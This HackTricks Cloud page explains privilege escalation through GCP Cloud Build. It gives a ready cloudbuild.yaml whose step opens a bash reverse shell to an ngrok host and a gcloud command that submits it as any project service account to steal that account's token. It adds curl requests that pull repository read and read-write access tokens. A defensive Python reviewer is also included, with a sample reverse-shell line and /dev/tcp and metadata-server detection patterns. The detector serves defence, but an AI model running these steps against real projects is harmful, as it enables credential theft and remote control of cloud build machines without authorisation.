GCP - Cloudbuild Privesc
cloudbuild
For more information about Cloud Build, see:
cloudbuild.builds.create, iam.serviceAccounts.actAs
With these permissions you can submit a cloud build. By default, the cloudbuild machine has a token for the cloudbuild Service Account in its filesystem: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. However, you can specify any service account inside the project in the cloudbuild configuration.
Therefore, you can simply make the machine exfiltrate the token to your server, or get a reverse shell inside it and retrieve the token yourself (the file containing the token might change).
Direct exploitation via gcloud CLI
1- Create cloudbuild.yaml and modify it with your listener data
steps:
  - name: bash
    script: |
      #!/usr/bin/env bash
      bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1
options:
  logging: CLOUD_LOGGING_ONLY
2- Submit a simple build with no source, passing the yaml file and specifying the SA to use for the build:
gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com"
Using the python gcloud library
You can find the original exploit script here on GitHub (but the location it takes the token from didn't work for me). Therefore, check a script to automate the creation, exploitation and cleanup of a vulnerable environment here, and a python script to get a reverse shell inside the cloudbuild machine and steal the token here (in the code you can find how to specify other service accounts).
For a more in-depth explanation, visit https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/
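From the defender's side, the build described above leaves a recognisable shape in the project's build history: a user-specified service account, no source, and an inline step that opens a socket. The following is an added example, not code from this page or from the linked scripts. It reviews Build resources in the JSON shape of `gcloud builds list --format=json`; the sample data, project and account names are constructed, and the pattern list is an assumption to tune per environment.

```python
import json
import re

# Constructed sample shaped like `gcloud builds list --format=json` output
# (Cloud Build v1 Build resources); project and account names are made up.
SAMPLE_BUILDS = json.loads("""
[
 {"id": "build-a", "source": {"storageSource": {"bucket": "src", "object": "app.tgz"}},
  "steps": [{"name": "gcr.io/cloud-builders/docker", "args": ["build", "."]}]},
 {"id": "build-b",
  "serviceAccount": "projects/demo-proj/serviceAccounts/deployer@demo-proj.iam.gserviceaccount.com",
  "steps": [{"name": "bash", "script": "bash -i >& /dev/tcp/listener.example/4444 0>&1"}],
  "options": {"logging": "CLOUD_LOGGING_ONLY"}}
]
""")

# Default Cloud Build service account as named on this page.
DEFAULT_SA = re.compile(r"(^|/)\d+@cloudbuild\.gserviceaccount\.com$")
# Assumed indicators: raw bash sockets or metadata-server credential reads.
SUSPICIOUS = re.compile(r"/dev/tcp/|metadata\.google\.internal|169\.254\.169\.254")


def step_text(step):
    """Concatenate everything a step will execute: inline script, entrypoint, args."""
    parts = [step.get("script", ""), step.get("entrypoint", "")] + step.get("args", [])
    return " ".join(parts)


def review_build(build):
    """Return a list of reasons this build deserves a closer look."""
    findings = []
    sa = build.get("serviceAccount", "")
    if sa and not DEFAULT_SA.search(sa):
        findings.append(f"runs as user-specified service account {sa}")
    if "source" not in build:
        findings.append("submitted without source")
    for i, step in enumerate(build.get("steps", [])):
        if SUSPICIOUS.search(step_text(step)):
            findings.append(f"step {i} opens a socket or queries the metadata server")
    return findings


def review_builds(builds):
    """Map build id -> findings, only for builds with at least one finding."""
    return {b["id"]: f for b in builds if (f := review_build(b))}


if __name__ == "__main__":
    for build_id, findings in review_builds(SAMPLE_BUILDS).items():
        print(build_id, "->", "; ".join(findings))
```

Each finding on its own is common in legitimate pipelines; the combination on a single build is what merits review of who holds cloudbuild.builds.create together with iam.serviceAccounts.actAs.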
cloudbuild.repositories.accessReadToken
With this permission the user can get the read access token used to access the repository:
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"
cloudbuild.repositories.accessReadWriteToken
With this permission, the user can get the read and write access token used to access the repository:
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"
cloudbuild.connections.fetchLinkableRepositories
With this permission you can get the repos the connection has access to:
curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"
HackTricks Cloud